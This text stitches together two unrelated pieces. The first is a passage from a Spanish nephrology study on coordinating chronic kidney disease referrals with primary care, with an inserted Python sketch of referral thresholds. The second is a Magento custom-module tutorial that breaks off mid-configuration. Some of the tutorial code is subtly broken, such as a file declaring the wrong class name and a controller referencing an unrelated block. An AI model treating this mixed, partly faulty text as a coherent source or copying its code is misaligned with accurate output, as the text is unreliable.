For the last two years, we have used a shared clinical information system called "Salut en Xarxa" (Catalan for "Health in the Network") in the evaluation of information on referrals from primary health providers and for the corresponding elaboration of reports when the consensus criteria were not upheld. This shared clinical information system has allowed us to gain access to the laboratory results, prescriptions, referrals to specialists, and clinical comments made by family doctors. These doctors also had access to all types of reports, laboratory results, and pathology/radiology reports originating in the hospital. The nephrology department assessed the adequacy of the referrals, and in the case of an inadequate referral, a report was written with the pertinent explanations and recommendations for the case. This system has allowed us to prioritise the response time for requests from primary health care providers; thus, for requests confirmed as high-priority, such as asymptomatic patients with serum creatinine levels greater than 3 mg/dl detected in primary health care, a specific programme ensured a visit within the week. Symptomatic cases have been referred directly to hospital emergency services for nephrological examination and possible hospitalisation.

The data regarding the denial of requests were compiled from medical reports. The statistical analysis was performed with ANOVA and descriptive statistics, using SPSS statistical software for Windows, version 15.

RESULTS

For the last 3 years, nephrological consultations have been progressively implemented in our reference population area. As the number of primary care units with access to the consultations increased, it was easier to apply and explain the consensus criteria agreed upon with the primary care management team to the rest of the department. These consultations provided a personalised relationship, rapid access to a nephrologist, and continuous training. Figure 1 shows the progression since 2004 of the first nephrology visits requested by primary health care providers, those cases denied and returned with an explanatory report, and the visits performed. The number of nephrology visits requested from primary health care providers increased from 417 in 2004 to 544 in 2009 (30.46%), but in 2009 the number of requested visits stabilised. However, we have observed a reduction in the number of first nephrology visits made that originated in primary care, and a clear change in tendency has occurred since the coordinated care programme was initially implemented. Denied requests made up 28.49% of the total number of requested visits in 2009. Ninety-six e-mails with their respective clinical cases were exchanged between primary health care providers and the nephrology department in 2009, and the number of successive visits continued to increase, with patients more and more highly selected. Thus, whereas 5263 successive visits were held in outpatient clinics during 2006, 6616 were held in 2009, an increase of 25.71%.
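To make the referral thresholds described in the Methods concrete, the sketch below combines the MDRD-4 IDMS estimate of glomerular filtration rate with the age-dependent cut-offs and the albumin/creatinine criterion summarised above. The MDRD coefficients are the standard published ones, not quoted from the article; the function names are illustrative, and other criteria mentioned in the consensus (e.g., nephrogenic anaemia, refractory or secondary AHT) are deliberately omitted.

def egfr_mdrd4_idms(creatinine_mg_dl, age_years, female=False, black=False):
    """Standard 4-variable MDRD (IDMS-traceable) eGFR in ml/min/1.73 m2."""
    egfr = 175.0 * creatinine_mg_dl ** -1.154 * age_years ** -0.203
    if female:
        egfr *= 0.742
    if black:
        egfr *= 1.212
    return egfr

def refer_to_nephrology(egfr, age_years, acr_mg_g, progressive_decline=False):
    """Schematic version of the age-dependent referral criteria described above."""
    gfr_threshold = 40 if age_years <= 70 else 30   # cut-off depends on age (<=70 vs >70 years)
    if egfr < gfr_threshold:
        return True
    if progressive_decline:                         # progressive deterioration is always referred
        return True
    if acr_mg_g > 500:                              # proteinuria criterion (albumin/creatinine ratio)
        return True
    return False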
We analysed the reasons for rejection of first visit requests sent to the nephrology department from primary health care providers during a one-year period between 30 June 2009 and 1 July 2010, using the reports filed for each request. During this period, of a total of 559 first visit requests sent from primary health care providers to the nephrology department, 188 were denied (33.63%). Table 2 displays the reasons for denial. Here we must point out that the main cause was the presence of stage 3 CKD (MDRD-estimated glomerular filtration rate >30ml/min/1.73 m2) in patients older than 70 years (44.15%), followed by stage 3a CKD (MDRD-estimated glomerular filtration rate 45-59ml/min/1.73 m2) in patients <70 years old (19.15%). Isolated proteinuria expressed as an albumin/creatinine ratio <500mg/g was the cause in 12.23% of cases. In the ANOVA analysis, the criteria related to the glomerular filtration rate compared with those related to proteinuria corresponded significantly to a population 12 years older (P=.007). Another significant cause for denying requests was non-secondary, non-refractory essential AHT (11.17%). In the “Other” group, several different causes are included, such as: simple renal cysts, renal agenesis, solitary kidney, isolated haematuria not yet assessed by an urologist, mild hyperkalaemia, residual lesions in renal ultrasounds, etc. The mean time elapsed between the request for the visit from primary care and the actual visit was 61 days, but priority cases were preferentially handled within one month, and cases of the high priority (rapidly progressing renal failure) were seen within one week. Emergency cases, such as acute renal failure and hypertensive crisis, required patient admission in emergency services.   The following topics were focused on in the continuous training of family doctors: presentation and discussion of the coordinated care programme, epidemiology of chronic kidney disease, AHT and pregnancy, refractory AHT, recommended medications for AHT (Interlevel consensus document: primary-nephrology care), assessment of proteinuria, renal cysts, conservative treatment of advanced kidney failure, therapeutic compliance, assessment of hyperkalaemia, diabetic nephropathies, renal failure and drugs, secondary effects of anti-AHT drugs, use of diuretics, and kidney failure in elderly patients.   No instances of conflict were produced, and family doctors expressed their satisfaction with the methodology used.   DISCUSSION   The Spanish public health system is organised into the realms of primary health care and specialised care. The primary health care has attempted to follow the recommendations of the World Health Organisation (WHO) International Conference held in Alma-Ata in 1978, with Spain’s participation, which produced a tangible innovation in the conceptualisation of primary health care.10 In this model, primary health care is placed at the nucleus of the health system, and is charged with health care, promotion, and prevention activities. The three critical points for the development of primary health care have been the integration of family doctors into full-time employment, the establishment of clinical histories, and the capacity to train residents in family and community medicine.11 Within this framework, specialised health care takes its place as the leader in knowledge and procedures for the specific aspects of health problems. 
Coordination and communication with primary health care providers is essential in order to offer an adequate health care service to the population at large, and professional confidence to family doctors. The lack of communication between the realms of primary and specialised health care providers is a real and tangible issue in the Spanish health system.11   The high prevalence of CKD, especially in elderly patients, requires a work system coordinated with primary health care providers. The prevalence of CKD of 23.62% in people older than 64 years in Spain, as indicated by the EPIRCE study,5 cannot be tackled by nephrology alone, and coordination with primary health care providers is necessary. The most common form of CKD is stage 3, which affects elderly patients most of all. Its progression only requires kidney replacement therapy within 5 years in 1.3% of cases, but it has an elevated mortality (24.3%), mostly due to cardiovascular problems.12 In addition, follow-up of patients with stage 4 CKD and estimated glomerular filtration rate from >15 to <30ml/min/1.73m2 indicates that the majority of elderly patients with mild proteinuria and slow deterioration of kidney function does not need kidney replacement therapy, but tight collaboration with primary care providers.13 As the patient’s age increases, glomerular filtration rate progressively decreases,14 although not all cases involve a decrease, since this condition is not observed in a third of the elderly population without hypertension.15 Kidney disease in elderly patients is generally characterised by hypertension-related nephroangiosclerosis, which is frequently accompanied by diabetic nephropathies and other pathological processes.16 The clinical progression of this condition can be slow,17,18 and the rate of renal deterioration can be lower than in young patients.19   The methodology for coordination is a challenge for current nephrological clinical practice. Coordination and shared treatment are key factors for responding to this important health care need. Some shared treatment programmes for patients with kidney disease have revealed that up to 30% of kidney patients do not require direct visits with nephrologists when maintaining consistent treatment through primary health care providers.20 Coordination must be based on agreed upon protocols with criteria for referrals and shared treatment. Cardiovascular risk prevention is a general function of primary care that must be shared with specialised care providers for the different typical pathologies, such as diabetes mellitus, kidney failure, cardiopathies, AHT, peripheral arteriopathy, and cerebral ischaemia. The primary health care management boards are key pieces in the effort to come to a consensus on the criteria for patient referral and shared treatment. After the criteria are agreed upon, in situ consensus must be reached with the family doctors at each health centre in order to put these criteria into practice. In our experience, continuous training of primary care providers regarding common referral aspects and shared nephrological treatment is very enriching and a valuable tool. The reports on referrals that were considered inadequate for specialised care have also been a useful tool for this continuous training. The absence of conflicts with primary health care providers with such a high rate of denied requests for first nephrology visits has confirmed that our methodology is appropriate. 
Another source of referrals for first visits to outpatient nephrology units is referrals generated internally at the hospital, but these have not been analysed in this study. The selection process for first visits with a nephrologist has not led to a decrease in outpatient nephrological activity; on the contrary, we have observed a continuous increase in successive visits (a 25.71% increase in the last 4 years) as a consequence of the increase in the number of patients cared for. We must also take into account that this increase in successive visits has occurred in spite of the higher rate of patients discharged from outpatient nephrology units and left to the care of family doctors as the referral criteria of the coordination protocol have been implemented. All of these processes have resulted in an increased number of successive visits by more complex nephrology patients requiring greater attention. One of the areas of growth in our outpatient non-transplant nephrology services has been the increasing number of kidney transplant patients in the postoperative stabilisation phase, following clinical guidelines for non-transplant nephrology departments.21

Shared clinical information in the public health system is necessary for efficient and high-quality health care. Redundancy in the examinations between primary and specialised health care would be pointless, and there is no reason not to share clinical information between the different levels of the health system. Information and communications technologies have allowed us to establish shared clinical histories between health care providers. The advantages of this instrument are evident in the improved efficiency of the system and of daily clinical practice. In an area of medicine such as nephrology, in which it is easy to establish criteria for the severity of pathologies through complementary examinations and drug prescriptions, applying objective referral criteria is straightforward when the necessary information is available, as in our case. This allows us to speak of a continuum of health care in which a patient suffering a non-life-threatening kidney disorder does not need to be physically present in the nephrology unit. In our experience, this shared clinical information tool, called "Salut en Xarxa" in our region, is extraordinarily useful. In the case of a preferential referral of a patient suffering severe renal failure, we can know the current glomerular filtration rate and its evolution from previous laboratory results, and the same can be said of requests for referral due to proteinuria. Furthermore, in the case of AHT, the progression of the medication prescribed can be taken into account, and strategies for clinical treatment can be suggested according to the clinical protocols from the consensus, without the need to perform a visit.

In conclusion, our coordinated care programme with primary health care providers has yielded a clear improvement in the adequacy of patient prioritisation and referrals to the nephrology department. The fundamental elements of this process have been: a programme agreed upon with the primary care management team, the SEN-SEMFYC consensus document on CKD, a shared clinical information system, in-person and electronic consultations, explanatory reports and recommendations in the cases of denied referrals, and a programme for continuous training of primary health care providers.
Table 1. General criteria established in the consensus for referring patients from primary care to nephrology specialists.
Table 2. Reasons for rejecting requests for first visits sent by primary health care providers.
Figure 1. Progression of the first nephrology visits requested by primary health care providers.

Bibliography
[1] National Kidney Foundation. K/DOQI clinical practice guidelines for chronic kidney disease. Definition and classification of stages of chronic kidney disease. Am J Kidney Dis 2002;39(Suppl 1):S46-S75.
[2] National Kidney Foundation. K/DOQI clinical practice guidelines for chronic kidney disease. Evaluation of laboratory measurements for clinical assessment of kidney disease. Am J Kidney Dis 2002;39(Suppl 1):S76-S110.
[3] Zhang QL, Rothenbacher D. Prevalence of chronic kidney disease in population-based studies: systematic review. BMC Public Health 2008;8:117. [Pubmed]
[4] Coresh J, Selvin E, Stevens LA, et al. Prevalence of chronic kidney disease in the United States. JAMA 2007;298(17):2038-47. [Pubmed]
[5] Otero A, de Francisco A, Gayoso P, García F, on behalf of the EPIRCE Study Group. Prevalence of chronic renal disease in Spain: results of the EPIRCE study. Nefrologia 2010;30(1):78-86. [Pubmed]
[6] Banegas Banegas JR. Epidemiología de la hipertensión arterial en España. Situación actual y perspectivas. Hipertensión 2005;22(9):353-62.
[7] Alcázar R, Martín de Francisco AL. Acción estratégica de la S.E.N. frente a la enfermedad renal. Nefrologia 2006;26:1-4.
[8] Torregrosa I, Solís M, Pascual B, Ramos B, González M, Ramos C, et al. Resultados preliminares de la implantación de un protocolo conjunto de manejo de la enfermedad renal crónica entre atención primaria y nefrología. Nefrologia 2007;27:162-7. [Pubmed]
[9] Alcázar R, Egocheaga I, Ortes L, Lobos JM, González Parra E, Álvarez Guisasola F, et al. Documento de consenso S.E.N.-semFYC sobre la enfermedad renal crónica. Nefrologia 2008;28(3):273-82. [Pubmed]
[10] Organización Mundial de la Salud. Alma-Ata 1978. Atención Primaria de Salud. Ginebra: OMS, 1978.
[11] Gérvas J, Pérez Fernández M, Palomo Cobos L, Pastor Sánchez R. Veinte años de reforma de la Atención Primaria en España. Valoración para un aprendizaje por acierto/error. Madrid: Ministerio de Sanidad y Consumo; 2005. Disponible en: www.msc.es
[12] Keith DS, Nichols GA, Gullion CM, Brown JB, Smith DH. Longitudinal follow-up and outcomes among a population with chronic kidney disease in a large managed care organization. Arch Intern Med 2004;164:659-63. [Pubmed]
[13] Conway B, Webster A, Ramsay G, Morgan N, Neary J, Whitworth C, et al. Predicting mortality and uptake of renal replacement therapy in patients with stage 4 chronic kidney disease. Nephrol Dial Transplant 2009;24(6):1930-7. [Pubmed]
[14] Epstein M. Aging and the kidney. J Am Soc Nephrol 1996;7:1106-22. [Pubmed]
[15] Lindeman RD, Goldman R. Anatomic and physiologic age changes in the kidney. Exp Gerontol 1986;21:379-406. [Pubmed]
[16] Zhou XJ, Rakheja D, Yu X, Saxena R, Vaziri ND, Silva FG. The aging kidney. Kidney Int 2008;74:710-20. [Pubmed]
[17] Hemmelgarn BR, Zhang J, Manns BJ, Tonelli M, Larsen E, Ghali WA, et al. Progression of kidney dysfunction in the community-dwelling elderly. Kidney Int 2006;69:2155-61. [Pubmed]
[18] Heras M, Fernández Reyes MJ, Guerrero MT, Sánchez R, Muñoz A, Macías MC, et al. Ancianos con enfermedad renal crónica: ¿qué ocurre a los 24 meses de seguimiento? Nefrologia 2009;29(4):343-9. [Pubmed]
[19] O'Hare AM, Bertenthal D, Walter LC, Garg AX, Covinsky K, Kaufman JS, et al. When to refer patients with chronic kidney disease for vascular access surgery: should age be a consideration? Kidney Int 2007;71:555-61. [Pubmed]
[20] Jones C, Roderick P, Harris S, Rogerson M. An evaluation of a shared primary and secondary care nephrology service for managing patients with moderate to advanced CKD. Am J Kidney Dis 2006;47(1):103-14. [Pubmed]
[21] Oppenheimer F, García M, López T, Campistol JM. Coordinación entre unidad de trasplante renal y servicio de nefrología no trasplantador. En: Guía de vuelta a diálisis del paciente trasplantado. Nefrologia 2009;29(Supl 1):S72-S77.
Magento - Create Custom Module with Custom Database Table You can easily create Magento custom modules by going through the common module structure of Magento. Here we have explained all required module structure file for creating custom Magento module. Let’s setup our directory structure: /app/code/local/<Namespace>/<Module>/ Block/ controllers/ etc/ Model/ Mysql4/ / sql/ _setup/ Activate Module Magento requires there to be an XML file that tells Magento to look for and use your custom module. /app/etc/modules/<Namespace>_<Module>.xml <?xml version=“1.0”?> <config> <modules> <[Namespace]_[Module]> <active>true</active> <codePool>local</codePool> </[Namespace]_[Module]> </modules> </config> Also you can disable your module in the Configuration menu on the backend via the Advanced tab. Create Controller /app/code/local/<Namespace>/<Module>/controllers/IndexController.php <?php class __IndexController extends Mage_Core_Controller_Front_Action { public function indexAction() { $this->loadLayout(); $this->renderLayout(); } } Create Configuration XML /app/code/local/<Namespace>/<Module>/etc/config.xml <?xml version=“1.0”?> <config> <modules> <[Namespace]_[Module]> <version>0.1.0</version> </[Namespace]_[Module]> </modules> <frontend> <routers> <[module]> <use>standard</use> <args> <module>[Namespace]_[Module]</module> <frontName>[module]</frontName> </args> </[module]> </routers> <layout> <updates> <[module]> <file>[module].xml</file> </[module]> </updates> </layout> </frontend> <global> <models> <[module]> <class>[Namespace]_[Module]_Model</class> <resourceModel>[module]_mysql4</resourceModel> </[module]> <[module]_mysql4> <class>[Namespace]_[Module]_Model_Mysql4</class> <entities> <[module]> <table>[module]</table> </[module]> </entities> </[module]_mysql4> </models> <resources> <[module]_setup> <setup> <module>[Namespace]_[Module]</module> </setup> <connection> <use>core_setup</use> </connection> </[module]_setup> <[module]_write> <connection> <use>core_write</use> </connection> </[module]_write> <[module]_read> <connection> <use>core_read</use> </connection> </[module]_read> </resources> <blocks> <[module]> <class>[Namespace]_[Module]_Block</class> </[module]> </blocks> <helpers> <[module]> <class>[Namespace]_[Module]_Helper</class> </[module]> </helpers> </global> </config> Create Helper /app/code/local/<Namespace>/<Module>/Helper/Data.php <?php class __Helper_Data extends Mage_Core_Helper_Abstract { } Create Models If you are quite new to Magento you should pay attention to one of its specifics! The Constructors below are not the usual PHP-Constructors!! Keeping that in mind can save hours of frustrating crashes ;) /app/code/local/<Namespace>/<Module>/Model/<Module>.php <?php class <Namespace>_<Module>_Model_<Module> extends Mage_Core_Model_Abstract { public function _construct() { parent::_construct(); $this->_init(‘<module>/<module>’); /app/code/local/<Namespace>/<Module>/Model/Mysql4/<Module>.php <?php class <Namespace>_<Module>_Model_Mysql4_<Module> extends Mage_Core_Model_Mysql4_Abstract { public function _construct() { $this->_init(‘<module>/<module>’, ‘<module>_id’); } } NOTE: The ‘_id’ refers to the PRIMARY KEY in your database table. 
/app/code/local/<Namespace>/<Module>/Model/Mysql4/<Module>/Collection.php <?php class <Namespace>_<Module>_Model_Mysql4_<Module>_Collection extends Mage_Core_Model_Mysql4_Collection_Abstract { public function _construct() { //parent::__construct(); $this->_init(‘<module>/<module>’); } } SQL Setup /app/code/local/<Namespace>/<Module>/sql/<module>_setup/mysql4-install-0.1.0.php <?php $installer = $this; $installer->startSetup(); $installer->run(“ — DROP TABLE IF EXISTS {$this->getTable(‘<module>’)}; CREATE TABLE {$this->getTable(‘<module>’)} ( `<module>_id` int(11) unsigned NOT NULL auto_increment, `title` varchar(255) NOT NULL default ”, `content` text NOT NULL default ”, `status` smallint(6) NOT NULL default ‘0’, `created_time` datetime NULL, `update_time` datetime NULL, PRIMARY KEY (`<module>_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; “); $installer->endSetup(); NOTE: Please note the text that needs to be replaced. This SQL structure is up to you, this is merely a starting point. Note Important: If you add fields and couldn’t save data in these fields please try to go to System?Cache Management Then 1.Flush Cache Storage 2.Flush Magento Cache. Template Design /app/design/frontend/<interface>/<theme>/layout/<module>.xml /layout/.xml <?xml version=“1.0”?> <layout version=“0.1.0”> <[module]_index_index> <reference name=“content”> <block type=“[module]/[module]” name=“[module]” /> </reference> </[module]_index_index> </layout> NOTE: The block type will automatically figure out what template file to use based on the second [module] declaration. As an alternate way of declaring what template file to use you can use this: /app/design/frontend/<interface>/<theme>/layout/<module>.xml <?xml version=“1.0”?> <layout version=“0.1.0”> <[module]_index_index> <reference name=“content”> <block type=“core/template” name=“[module]” template=“[module]/[module].phtml” /> </reference> </[module]_index_index> </layout> /app/design/frontend/<interface>/<theme>/template/<module>/<module>.phtml <h4><?php echo $this->__(‘Module List’) ?></h4> <?php /* This will load one record from your database table. load(<module>_id) will load whatever ID number you give it. */ /* $news = Mage::getModel(‘<module>/<module>’)->load(1); echo $news->get<Module>Id(); echo $news->getTitle(); echo $news->getContent(); echo $news->getStatus(); */ /* This block of code loads all of the records in the database table. It will iterate through the collection and the first thing it will do is set the Title to the current value of $i which is incremented each iteration and then echo that value back out. At the very end it will save the entire collection. */ /* $i = 0; $collection = Mage::getModel(‘<module>/<module>’)->getCollection(); $collection->setPageSize(5); $collection->setCurPage(2); $size = $collection->getSize(); $cnt = count($collection); foreach ($collection as $item) { $i = $i+1; $item->setTitle($i); echo $item->getTitle(); } $collection->walk(‘save’); */ /* This shows how to load one value, change something and save it. */ /* $object = Mage::getModel(‘<module>/<module>’)->load(1); $object->setTitle(‘This is a changed title’); $object->save(); */ Directory Additions Here is the revised directory setup due to the additions and changes we need for the backend module. /app/code/local/<Namespace>/<Module>/ Block/ Adminhtml/ / Edit/ Tab/ controllers/ Adminhtml/ etc/ Helper/ Model/ Mysql4/ / sql/ _setup/ Blocks These control the setup and appearance of your grids and the options that they display. 
NOTE: Please note the fact that Block comes before Adminhtml in the class declaration. In any of the Magento modules in Adminhtml it is the opposite. For your module to work it has to be Block_Adminhtml otherwise you will get a ‘Cannot redeclare module...’ error. /app/code/local/<Namespace>/<Module>/Block/Adminhtml/<Module>.php <?php class <Namespace>_<Module>_Block_Adminhtml_<Module> extends Mage_Adminhtml_Block_Widget_Grid_Container { public function __construct() { $this->_controller = ‘adminhtml_<module>’; $this->_blockGroup = ‘<module>’; $this->_headerText = Mage::helper(‘<module>’)->__(‘Item Manager’); $this->_addButtonLabel = Mage::helper(‘<module>’)->__(‘Add Item’); parent::__construct(); } } /app/code/local/<Namespace>/<Module>/Block/Adminhtml/<Module>/Edit.php <?php class <Namespace>_<Module>_Block_Adminhtml_<Module>_Edit extends Mage_Adminhtml_Block_Widget_Form_Container { public function __construct() { parent::__construct(); $this->_objectId = ‘id’; $this->_blockGroup = ‘<module>’; $this->_controller = ‘adminhtml_<module>’; $this->_updateButton(‘save’, ‘label’, Mage::helper(‘<module>’)->__(‘Save Item’)); $this->_updateButton(‘delete’, ‘label’, Mage::helper(‘<module>’)->__(‘Delete Item’)); } public function getHeaderText() { if( Mage::registry(‘<module>_data’) && Mage::registry(‘<module>_data’)->getId() ) { return Mage::helper(‘<module>’)->__(“Edit Item ‘%s'”, $this->htmlEscape(Mage::registry(‘<module>_data’)->getTitle())); } else { return Mage::helper(‘<module>’)->__(‘Add Item’); } } } /app/code/local/<Namespace>/<Module>/Block/Adminhtml/<Module>/Grid.php <?php class <Namespace>_<Module>_Block_Adminhtml_<Module>_Grid extends Mage_Adminhtml_Block_Widget_Grid { public function __construct() { parent::__construct(); $this->setId(‘<module>Grid’); // This is the primary key of the database $this->setDefaultSort(‘<module>_id’); $this->setDefaultDir(‘ASC’); $this->setSaveParametersInSession(true); } protected function _prepareCollection() { $collection = Mage::getModel(‘<module>/<module>’)->getCollection(); $this->setCollection($collection); return parent::_prepareCollection(); } protected function _prepareColumns() { $this->addColumn(‘<module>_id’, array( ‘header’ => Mage::helper(‘<module>’)->__(‘ID’), ‘align’ =>‘right’, ‘width’ => ’50px’, ‘index’ => ‘<module>_id’, )); $this->addColumn(‘title’, array( ‘header’ => Mage::helper(‘<module>’)->__(‘Title’), ‘align’ =>‘left’, ‘index’ => ‘title’, )); /* $this->addColumn(‘content’, array( ‘header’ => Mage::helper(‘<module>’)->__(‘Item Content’), ‘width’ => ‘150px’, ‘index’ => ‘content’, )); */ $this->addColumn(‘created_time’, array( ‘header’ => Mage::helper(‘<module>’)->__(‘Creation Time’), ‘align’ => ‘left’, ‘width’ => ‘120px’, ‘type’ => ‘date’, ‘default’ => ‘–‘, ‘index’ => ‘created_time’, )); $this->addColumn(‘update_time’, array( ‘header’ => Mage::helper(‘<module>’)->__(‘Update Time’), ‘align’ => ‘left’, ‘width’ => ‘120px’, ‘type’ => ‘date’, ‘default’ => ‘–‘, ‘index’ => ‘update_time’, )); $this->addColumn(‘status’, array( ‘header’ => Mage::helper(‘<module>’)->__(‘Status’), ‘align’ => ‘left’, ‘width’ => ’80px’, ‘index’ => ‘status’, ‘type’ => ‘options’, ‘options’ => array( 1 => ‘Active’, 0 => ‘Inactive’, ), )); return parent::_prepareColumns(); } public function getRowUrl($row) { return $this->getUrl(‘*/*/edit’, array(‘id’ => $row->getId())); } } /app/code/local/<Namespace>/<Module>/Block/Adminhtml/<Module>/Edit/Form.php <?php class <Namespace>_<Module>_Block_Adminhtml_<Module>_Edit_Tab_Form extends Mage_Adminhtml_Block_Widget_Form { 
protected function _prepareForm() { $form = new Varien_Data_Form(); $this->setForm($form); $fieldset = $form->addFieldset(‘<module>_form’, array(‘legend’=>Mage::helper(‘<module>’)->__(‘Item information’))); $fieldset->addField(‘title’, ‘text’, array( ‘label’ => Mage::helper(‘<module>’)->__(‘Title’), ‘class’ => ‘required-entry’, ‘required’ => true, ‘name’ => ‘title’, )); $fieldset->addField(‘status’, ‘select’, array( ‘label’ => Mage::helper(‘<module>’)->__(‘Status’), ‘name’ => ‘status’, ‘values’ => array( array( ‘value’ => 1, ‘label’ => Mage::helper(‘<module>’)->__(‘Active’), ), array( ‘value’ => 0, ‘label’ => Mage::helper(‘<module>’)->__(‘Inactive’), ), ), )); $fieldset->addField(‘content’, ‘editor’, array( ‘name’ => ‘content’, ‘label’ => Mage::helper(‘<module>’)->__(‘Content’), ‘title’ => Mage::helper(‘<module>’)->__(‘Content’), ‘style’ => ‘width:98%; height:400px;’, ‘wysiwyg’ => false, ‘required’ => true, )); if ( Mage::getSingleton(‘adminhtml/session’)->get<Module>Data() ) { $form->setValues(Mage::getSingleton(‘adminhtml/session’)->get<Module>Data()); Mage::getSingleton(‘adminhtml/session’)->set<Module>Data(null); } elseif ( Mage::registry(‘<module>_data’) ) { $form->setValues(Mage::registry(‘<module>_data’)->getData()); } return parent::_prepareForm(); } } /app/code/local/<Namespace>/<Module>/Block/Adminhtml/<Module>/Edit/Tabs.php <?php class <Namespace>_<Module>_Block_Adminhtml_<Module>_Edit_Tabs extends Mage_Adminhtml_Block_Widget_Tabs { public function __construct() { parent::__construct(); $this->setId(‘<module>_tabs’); $this->setDestElementId(‘edit_form’); $this->setTitle(Mage::helper(‘<module>’)->__(‘News Information’)); } protected function _beforeToHtml() { $this->addTab(‘form_section’, array( ‘label’ => Mage::helper(‘<module>’)->__(‘Item Information’), ‘title’ => Mage::helper(‘<module>’)->__(‘Item Information’), ‘content’ => $this->getLayout()->createBlock(‘<module>/adminhtml_<module>_edit_tab_form’)->toHtml(), )); return parent::_beforeToHtml(); } } /app/code/local/<Namespace>/<Module>/Block/Adminhtml/<Module>/Edit/Tab/Form.php <?php class <Namespace>_<Module>_Block_Adminhtml_<Module>_Edit_Tab_Form extends Mage_Adminhtml_Block_Widget_Form { protected function _prepareForm() { $form = new Varien_Data_Form(); $this->setForm($form); $fieldset = $form->addFieldset(‘<module>_form’, array(‘legend’=>Mage::helper(‘<module>’)->__(‘Item information’))); $fieldset->addField(‘title’, ‘text’, array( ‘label’ => Mage::helper(‘<module>’)->__(‘Title’), ‘class’ => ‘required-entry’, ‘required’ => true, ‘name’ => ‘title’, )); $fieldset->addField(‘status’, ‘select’, array( ‘label’ => Mage::helper(‘<module>’)->__(‘Status’), ‘name’ => ‘status’, ‘values’ => array( array( ‘value’ => 1, ‘label’ => Mage::helper(‘<module>’)->__(‘Active’), ), array( ‘value’ => 0, ‘label’ => Mage::helper(‘<module>’)->__(‘Inactive’), ), ), )); $fieldset->addField(‘content’, ‘editor’, array( ‘name’ => ‘content’, ‘label’ => Mage::helper(‘<module>’)->__(‘Content’), ‘title’ => Mage::helper(‘<module>’)->__(‘Content’), ‘style’ => ‘width:98%; height:400px;’, ‘wysiwyg’ => false, ‘required’ => true, )); if ( Mage::getSingleton(‘adminhtml/session’)->get<Module>Data() ) { $form->setValues(Mage::getSingleton(‘adminhtml/session’)->get<Module>Data()); Mage::getSingleton(‘adminhtml/session’)->set<Module>Data(null); } elseif ( Mage::registry(‘<module>_data’) ) { $form->setValues(Mage::registry(‘<module>_data’)->getData()); } return parent::_prepareForm(); } } Controller 
/app/code/local/<Namespace>/<Module>/controllers/Adminhtml/<Module>Controller.php <?php class <Namespace>_<Module>_Adminhtml_<Module>Controller extends Mage_Adminhtml_Controller_Action { protected function _initAction() { $this->loadLayout() ->_setActiveMenu(‘<module>/items’) ->_addBreadcrumb(Mage::helper(‘adminhtml’)->__(‘Items Manager’), Mage::helper(‘adminhtml’)->__(‘Item Manager’)); return $this; } public function indexAction() { $this->_initAction(); $this->_addContent($this->getLayout()->createBlock(‘<module>/adminhtml_<module>’)); $this->renderLayout(); } public function editAction() { $<module>Id = $this->getRequest()->getParam(‘id’); $<module>Model = Mage::getModel(‘<module>/<module>’)->load($<module>Id); if ($<module>Model->getId() || $<module>Id == 0) { Mage::register(‘<module>_data’, $<module>Model); $this->loadLayout(); $this->_setActiveMenu(‘<module>/items’); $this->_addBreadcrumb(Mage::helper(‘adminhtml’)->__(‘Item Manager’), Mage::helper(‘adminhtml’)->__(‘Item Manager’)); $this->_addBreadcrumb(Mage::helper(‘adminhtml’)->__(‘Item News’), Mage::helper(‘adminhtml’)->__(‘Item News’)); $this->getLayout()->getBlock(‘head’)->setCanLoadExtJs(true); $this->_addContent($this->getLayout()->createBlock(‘<module>/adminhtml_<module>_edit’)) ->_addLeft($this->getLayout()->createBlock(‘<module>/adminhtml_<module>_edit_tabs’)); $this->renderLayout(); } else { Mage::getSingleton(‘adminhtml/session’)->addError(Mage::helper(‘<module>’)->__(‘Item does not exist’)); $this->_redirect(‘*/*/’); } } public function newAction() { $this->_forward(‘edit’); } public function saveAction() { if ( $this->getRequest()->getPost() ) { try { $postData = $this->getRequest()->getPost(); $<module>Model = Mage::getModel(‘<module>/<module>’); $<module>Model->setId($this->getRequest()->getParam(‘id’)) ->setTitle($postData[‘title’]) ->setContent($postData[‘content’]) ->setStatus($postData[‘status’]) ->save(); Mage::getSingleton(‘adminhtml/session’)->addSuccess(Mage::helper(‘adminhtml’)->__(‘Item was successfully saved’)); Mage::getSingleton(‘adminhtml/session’)->set<Module>Data(false); $this->_redirect(‘*/*/’); return; } catch (Exception $e) { Mage::getSingleton(‘adminhtml/session’)->addError($e->getMessage()); Mage::getSingleton(‘adminhtml/session’)->set<Module>Data($this->getRequest()->getPost()); $this->_redirect(‘*/*/edit’, array(‘id’ => $this->getRequest()->getParam(‘id’))); return; } } $this->_redirect(‘*/*/’); } public function deleteAction() { if( $this->getRequest()->getParam(‘id’) > 0 ) { try { $<module>Model = Mage::getModel(‘<module>/<module>’); $<module>Model->setId($this->getRequest()->getParam(‘id’)) ->delete(); Mage::getSingleton(‘adminhtml/session’)->addSuccess(Mage::helper(‘adminhtml’)->__(‘Item was successfully deleted’)); $this->_redirect(‘*/*/’); } catch (Exception $e) { Mage::getSingleton(‘adminhtml/session’)->addError($e->getMessage()); $this->_redirect(‘*/*/edit’, array(‘id’ => $this->getRequest()->getParam(‘id’))); } } $this->_redirect(‘*/*/’); } /** * Product grid for AJAX request. * Sort and filter result for example. 
*/ public function gridAction() { $this->loadLayout(); $this->getResponse()->setBody( $this->getLayout()->createBlock(‘importedit/adminhtml_<module>_grid’)->toHtml() ); } } XML Configuration Changes /app/code/local/<Namespace>/<Module>/etc/config.xml <?xml version=“1.0”?> <config> <modules> <[Namespace]_[Module]> <version>0.1.0</version> </[Namespace]_[Module]> </modules> <frontend> <routers> <[module]> <use>standard</use> <args> <module>[Namespace]_[Module]</module> <frontName>[module]</frontName> </args> </[module]> </routers> <layout> <updates> <[module]> <file>[module].xml</file> </[module]> </updates> </layout> </frontend> <admin> <routers> <[module]> <use>admin</use> <args> <module>[Namespace]_[Module]</module> <frontName>[module]</frontName> </args> </[module]> </routers> </admin> <adminhtml> <menu> <[module] module=“[module]”> <title>[Module]</title> <sort_order>71</sort_order> <children> <items module=“[module]”> <title>Manage Items</title> <sort_order>0</sort_order> <action>[module]/adminhtml_[module]</action> </items> </children> </[module]> </menu> <acl> <resources> <all> <title>Allow Everything</title> </all> <admin> <children> <[module]> <title>[Module] Module</title> <sort_order>200</sort_order> </[module]> </children> </admin> </resources> </acl> <layout> <updates> <[module]> <file>[module].xml</file> </[module]> </updates> </layout> </adminhtml> <global> <models> <[module]> <class>[Namespace]_[Module]_Model</class> <resourceModel>[module]_mysql4</resourceModel> </[module]> <[module]_mysql4> 